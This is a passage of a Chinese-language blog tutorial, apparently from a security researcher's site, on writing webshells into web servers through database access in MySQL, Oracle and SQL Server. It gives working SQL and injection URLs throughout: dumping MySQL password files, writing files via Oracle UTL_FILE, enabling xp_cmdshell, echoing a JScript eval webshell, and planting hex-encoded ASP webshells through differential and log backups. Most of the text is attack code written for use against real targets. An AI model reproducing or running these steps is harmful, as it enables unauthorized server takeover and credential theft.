<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT xxx FROM ascotbe INTO OUTFILE &#39;D:&#x2F;2.txt&#39;;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/11.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721165110113" class="fancybox"><img alt="image-20200721165110113" title="image-20200721165110113" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/11.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>然后删除表</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DROP TABLE ascotbe;</span><br></pre></td></tr></table></figure></div>

<h3 id="低权限利用"><a href="#低权限利用" class="headerlink" title="低权限利用"></a>低权限利用</h3><p>如果你发现一个注入点，但是这个注入点只是一个普通权限没法写 shell </p>
<p>利用条件：</p>
<ul>
<li><p>知道一个数据库用户账密</p>
</li>
<li><p>能进入到 phpmyadmin 下</p>
</li>
<li><p>一些默认文件路径位置没有更改</p>
<p>首先查看日志是否开启，然后看看日志文件路径根据这个路径推算出默认的<strong>user.MYD</strong>路径。一般默认的位置都是在 Mysql\data\mysql\user.MYD 这个路径下</p>
</li>
</ul>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#39;%general%&#39;;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/12.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721170600378" class="fancybox"><img alt="image-20200721170600378" title="image-20200721170600378" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/12.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>然后把密码的文件导入到表里面，这边插入的表为<strong>ascotbe</strong>，这边有个点需要注意下导入文件的位置需要用<code>\</code>可能会报错，需要替换成<code>/</code></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">LOAD DATA LOCAL INFILE &#39;C:&#x2F;phpStudy&#x2F;PHPTutorial&#x2F;MySQL&#x2F;data&#x2F;mysql&#x2F;user.MYD&#39; INTO TABLE ascotbe FIELDS TERMINATED BY &#39;&#39;;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/13.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721171534970" class="fancybox"><img alt="image-20200721171534970" title="image-20200721171534970" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/13.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>可以看到导入成功</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/14.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200721171817802" class="fancybox"><img alt="image-20200721171817802" title="image-20200721171817802" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/14.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h2 id="Oracle数据库"><a href="#Oracle数据库" class="headerlink" title="Oracle数据库"></a>Oracle数据库</h2><p>首先是搭建环境，这边选着docker搭建，搭建好直接用navicat连接</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/17.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722162047188" class="fancybox"><img alt="image-20200722162047188" title="image-20200722162047188" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/17.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>这边测试使用的是DBA权限中的system账户</p>
<h3 id="利用文件访问包写shell"><a href="#利用文件访问包写shell" class="headerlink" title="利用文件访问包写shell"></a>利用文件访问包写shell</h3><p>首先创建我们得先建立一个ORACLE的目录对象指向<strong>XXXX</strong>，这边测试指向的路径为<strong>/home/oracle</strong></p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">create or replace directory IST0_DIR as &#39;&#x2F;home&#x2F;oracle&#39;;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/18.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722163209851" class="fancybox"><img alt="image-20200722163209851" title="image-20200722163209851" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/18.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>我们查看docker的路径，以及路径下的内容</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/19.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722163036270" class="fancybox"><img alt="image-20200722163036270" title="image-20200722163036270" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/19.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>如果后面写入失败了可以执行这条命令对这个目录进行授权下</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grant read, write on directory IST0_DIR to system;</span><br></pre></td></tr></table></figure></div>

<p>然后写入文件</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">declare</span><br><span class="line">   isto_file utl_file.file_type; --定义变量的类型为utl_file.file_type</span><br><span class="line">begin</span><br><span class="line">   isto_file :&#x3D; utl_file.fopen(&#39;IST0_DIR&#39;, &#39;ascotbe.jsp&#39;, &#39;W&#39;); --指定为IST0_DIR 目录下面的kj021320.jsp文件写操作</span><br><span class="line">   utl_file.put_line(isto_file, &#39;这是一个一句话webshell&#39;); --写入字符串</span><br><span class="line">   utl_file.fflush(isto_file); --刷缓冲</span><br><span class="line">   utl_file.fclose(isto_file); --关闭文件指针</span><br><span class="line">end;</span><br></pre></td></tr></table></figure></div>

<p>执行成功</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/20.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722163418044" class="fancybox"><img alt="image-20200722163418044" title="image-20200722163418044" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/20.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>可以发现写入了shell</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/21.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722163501324" class="fancybox"><img alt="image-20200722163501324" title="image-20200722163501324" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/21.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>如果是真实环境的话我们并不能连接服务器，这样我们怎么知道shell是否写入成功呢？</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">declare</span><br><span class="line">   isto_file utl_file.file_type; --如上</span><br><span class="line">   fp_buffer varchar2(4000); --没必要说了吧？</span><br><span class="line">begin</span><br><span class="line">   isto_file :&#x3D; utl_file.fopen(&#39;IST0_DIR&#39;, &#39;ascotbe.jsp&#39;, &#39;R&#39;); -- 指定为读操作</span><br><span class="line">   utl_file.get_line (isto_file , fp_buffer ); --读取一行放到  fp_buffer 变量里面</span><br><span class="line">   dbms_output.put_line(fp_buffer);--在终端输出结果看看</span><br><span class="line">   utl_file.fclose(isto_file); --关闭文件指针</span><br><span class="line">end;</span><br></pre></td></tr></table></figure></div>

<p>执行即可读取我们写入的文件内容了</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/22.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200722163711282" class="fancybox"><img alt="image-20200722163711282" title="image-20200722163711282" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/22.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h2 id="SqlServer数据库"><a href="#SqlServer数据库" class="headerlink" title="SqlServer数据库"></a>SqlServer数据库</h2><p>首先搭建环境，当前使用的环境是<strong>SQL Server 2019</strong>，具体的搭建自行百度</p>
<blockquote>
<p>拿shell的两大前提</p>
</blockquote>
<ol>
<li>有相应的权限db_owner</li>
<li>知道web目录的绝对路径</li>
</ol>
<p>测试的时候默认使用<strong>sa</strong>进行连接</p>
<h3 id="寻找绝对路径"><a href="#寻找绝对路径" class="headerlink" title="寻找绝对路径"></a>寻找绝对路径</h3><ul>
<li><p>报错信息</p>
</li>
<li><p>字典猜</p>
</li>
<li><p>旁站的目录</p>
</li>
<li><p>存储过程来搜索</p>
</li>
<li><p>读配置文件</p>
</li>
</ul>
<p>前三种方法都是比较常见的方法。我们主要来讲第四种调用存储过程来搜索。</p>
<p>在mssql中有两个存储过程可以帮我们来找绝对路径：<code>xp_cmdshell</code>和 <code>xp_dirtree</code></p>
<h4 id="利用xp-dirtree方法来寻找"><a href="#利用xp-dirtree方法来寻找" class="headerlink" title="利用xp_dirtree方法来寻找"></a>利用xp_dirtree方法来寻找</h4><p>先来看<code>xp_dirtree</code>直接举例子</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">execute master..xp_dirtree &#39;c:&#39; --列出所有c:\文件、目录、子目录 </span><br><span class="line">execute master..xp_dirtree &#39;c:&#39;,1 --只列c:\目录</span><br><span class="line">execute master..xp_dirtree &#39;c:&#39;,1,1 --列c:\目录、文件</span><br></pre></td></tr></table></figure></div>

<p>列出所有的C盘文件、目录、子目录</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/23.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723105433198" class="fancybox"><img alt="image-20200723105433198" title="image-20200723105433198" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/23.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>只列出目录</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/24.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723105502074" class="fancybox"><img alt="image-20200723105502074" title="image-20200723105502074" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/24.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>列出文件和目录</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/25.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723105539049" class="fancybox"><img alt="image-20200723105539049" title="image-20200723105539049" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/25.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<blockquote>
<p>注意</p>
</blockquote>
<p>这边使用<code>xp_dirtree</code>举例所列出的文件都是基于当前盘符当前目录的，不包括目录里面的文件，比如我们查看D盘内容</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/26.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723110109092" class="fancybox"><img alt="image-20200723110109092" title="image-20200723110109092" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/26.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/27.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723110137969" class="fancybox"><img alt="image-20200723110137969" title="image-20200723110137969" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/27.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>可以看到只有两个文件，可以论证之前说的</p>
<h5 id="真实环境下的操作"><a href="#真实环境下的操作" class="headerlink" title="真实环境下的操作"></a>真实环境下的操作</h5><p>当实际利用的时候我们可以创建一个临时表把存储过程查询到的路径插入到临时表中</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">CREATE TABLE tmp (dir varchar(8000),num int,num1 int);</span><br><span class="line">insert into tmp(dir,num,num1) execute master..xp_dirtree &#39;c:&#39;,1,1;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/28.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723110625751" class="fancybox"><img alt="image-20200723110625751" title="image-20200723110625751" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/28.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>然后查询下表发现成功写入</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/29.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723110801315" class="fancybox"><img alt="image-20200723110801315" title="image-20200723110801315" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/29.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h4 id="利用xp-cmdshell方法来寻找"><a href="#利用xp-cmdshell方法来寻找" class="headerlink" title="利用xp_cmdshell方法来寻找"></a>利用xp_cmdshell方法来寻找</h4><blockquote>
<p>SQL Server 阻止了对组件 <code>xp_cmdshell</code>的过程<strong>sys.xp_cmdshell</strong>的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用。</p>
</blockquote>
<p>如果遇到<code>xp_cmdshell</code>不能调用解决方法，这样我们就只能能执行CMD命令了，开启方面需要连接数据库才行。PS:如果都开启这种方法就不用写shell了直接执行CMD下载木马即可</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">;EXEC sp_configure &#39;show advanced options&#39;,1;&#x2F;&#x2F;允许修改高级参数</span><br><span class="line">RECONFIGURE;</span><br><span class="line">EXEC sp_configure &#39;xp_cmdshell&#39;,1;  &#x2F;&#x2F;打开xp_cmdshell扩展</span><br><span class="line">RECONFIGURE;--</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/30.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723112209434" class="fancybox"><img alt="image-20200723112209434" title="image-20200723112209434" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/30.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>接下来我们先来看cmd中怎么查找文件，该条命令如果用powershell会报错</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;r d:\ %i in (2*.php) do @echo %i</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/31.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723112513645" class="fancybox"><img alt="image-20200723112513645" title="image-20200723112513645" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/31.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>需要建立一个表 存在一个char字段就可以了</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1;CREATE TABLE cmdtmp (dir varchar(8000));</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1;insert into cmdtmp(dir) exec master..xp_cmdshell &#39;for &#x2F;r d:\ %i in (2*.php) do @echo %i&#39;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/32.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723112610911" class="fancybox"><img alt="image-20200723112610911" title="image-20200723112610911" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/32.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/33.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723112707616" class="fancybox"><img alt="image-20200723112707616" title="image-20200723112707616" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/33.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/34.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723112930188" class="fancybox"><img alt="image-20200723112930188" title="image-20200723112930188" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/34.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>成功查询出结果</p>
<h3 id="写入Webshell"><a href="#写入Webshell" class="headerlink" title="写入Webshell"></a>写入Webshell</h3><h4 id="利用xp-cmdshell命令写shell"><a href="#利用xp-cmdshell命令写shell" class="headerlink" title="利用xp_cmdshell命令写shell"></a>利用xp_cmdshell命令写shell</h4><p>上面说了xp_cmdshell这个存储过程可以用来执行cmd命令，那么我们可以通过cmd的echo命令来写入shell，当然前提是你知道web目录的绝对路径，如果不存在路径会报错。</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1;exec master..xp_cmdshell &#39;echo ^&lt;%@ Page Language&#x3D;&quot;Jscript&quot;%^&gt;^&lt;%eval(Request.Item[&quot;pass&quot;],&quot;unsafe&quot;);%^&gt; &gt; D:\\test\\ascotbe.aspx&#39; ;</span><br></pre></td></tr></table></figure></div>

<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/35.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723113418645" class="fancybox"><img alt="image-20200723113418645" title="image-20200723113418645" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/35.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>写入成功</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/36.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723113431063" class="fancybox"><img alt="image-20200723113431063" title="image-20200723113431063" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/36.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h4 id="差异备份写shell"><a href="#差异备份写shell" class="headerlink" title="差异备份写shell"></a>差异备份写shell</h4><p>因为权限的问题，最好不要备份到盘符根目录</p>
<p>当过滤了特殊的字符比如单引号，或者 路径符号 都可以使用定义局部变量来执行。</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1;backup database 库名 to disk &#x3D; &#39;D:\bak.bak&#39;;--</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1;create table [dbo].[test] ([cmd] [image]);</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1;insert into test(cmd) values(0x3C25657865637574652872657175657374282261222929253E);</span><br><span class="line">http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1;backup database 库名 to disk&#x3D;&#39;D:\ascotbe.asp&#39; WITH DIFFERENTIAL,FORMAT;--</span><br></pre></td></tr></table></figure></div>

<p>这里测试只能进行备份，执行最后一句差异备份会报错，所以可以直接进行备份写shell，虽然文件会很大</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/37.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723134845565" class="fancybox"><img alt="image-20200723134845565" title="image-20200723134845565" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/37.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/38.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723134901581" class="fancybox"><img alt="image-20200723134901581" title="image-20200723134901581" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/38.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/39.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723135025252" class="fancybox"><img alt="image-20200723135025252" title="image-20200723135025252" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/39.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<p>可以看到shell是写进去了，就是文件有点大</p>
<p><a href="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/40.png?raw=true" target="_blank" rel="noopener" data-fancybox="group" data-caption="image-20200723142516722" class="fancybox"><img alt="image-20200723142516722" title="image-20200723142516722" data-src="https://github.com/Ascotbe/Random-img/blob/master/DatabaseWriteWebshell/40.png?raw=true" src="/img/loading.gif" class="lazyload"></a></p>
<h4 id="log备份写shell"><a href="#log备份写shell" class="headerlink" title="log备份写shell"></a>log备份写shell</h4><p>LOG备份的要求是他的数据库备份过，而且选择恢复模式得是完整模式，至少在2008上是这样的，但是使用log备份文件会小的多，当然如果你的权限够高可以设置他的恢复模式</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;以下步骤省略http:&#x2F;&#x2F;xx.xx.xx.xx&#x2F;test.aspx?id&#x3D;1</span><br><span class="line">alter database 库名 set RECOVERY FULL;</span><br><span class="line">create table cmd (a image) ;</span><br><span class="line">backup log 库名 to disk &#x3D; &#39;D:\test&#39; with init ;</span><br><span class="line">insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E) ;</span><br><span class="line">backup log 库名 to disk &#x3D; &#39;D:\test\2.asp&#39;;</span><br></pre></td></tr></table></figure></div>



<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div><div class="copy-notice"></div><i class="fa fa-clipboard" aria-hidden="true"></i></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.cnblogs.com&#x2F;springside-example&#x2F;archive&#x2F;2007&#x2F;09&#x2F;06&#x2F;2529958.html</span><br><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;zyq357&#x2F;article&#x2F;details&#x2F;104698157</span><br><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;junmail&#x2F;article&#x2F;details&#x2F;4381287</span><br><span class="line">https:&#x2F;&#x2F;www.cnblogs.com&#x2F;xuliangxing&#x2F;p&#x2F;6005154.html</span><br><span class="line">https:&#x2F;&#x2F;y4er.com&#x2F;post&#x2F;mssql-getshell&#x2F;</span><br></pre></td></tr></table></figure></div>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">ascotbe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.ascotbe.com/2020/07/21/DatabaseWriteWebshell/">https://www.ascotbe.com/2020/07/21/DatabaseWriteWebshell/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.ascotbe.com">ascotbe</a>！</span></div></div><div class="tag_share"><div class="post_share"><div class="social-share" data-image="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/108.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/wechat.jpg" alt="微信"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/alipay.jpg" alt="支付寶"><div class="post-qr-code__desc">支付寶</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2020/07/23/InformationGathering/"><img class="prev_cover lazyload" data-src="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/109.jpg" onerror="onerror=null;src='/img/404.jpg'"><div 